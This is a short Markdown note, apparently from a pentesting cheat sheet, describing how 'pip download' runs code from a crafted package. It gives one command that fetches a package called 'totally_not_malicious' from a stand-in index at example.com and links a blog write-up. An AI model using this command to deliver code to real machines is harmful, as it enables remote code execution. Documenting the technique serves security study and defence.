13 lines
512 B
Markdown
13 lines
512 B
Markdown
|
# PIP Exploits
|
||
|
|
||
|
## pip download
|
||
|
|
||
|
Python pip executes tar files after the download option has been triggered.
|
||
|
Therefore, a hand crafted python module needs to be created and build.
|
||
|
After that pip can be used in the following way
|
||
|
```sh
|
||
|
pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v
|
||
|
```
|
||
|
|
||
|
An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)
|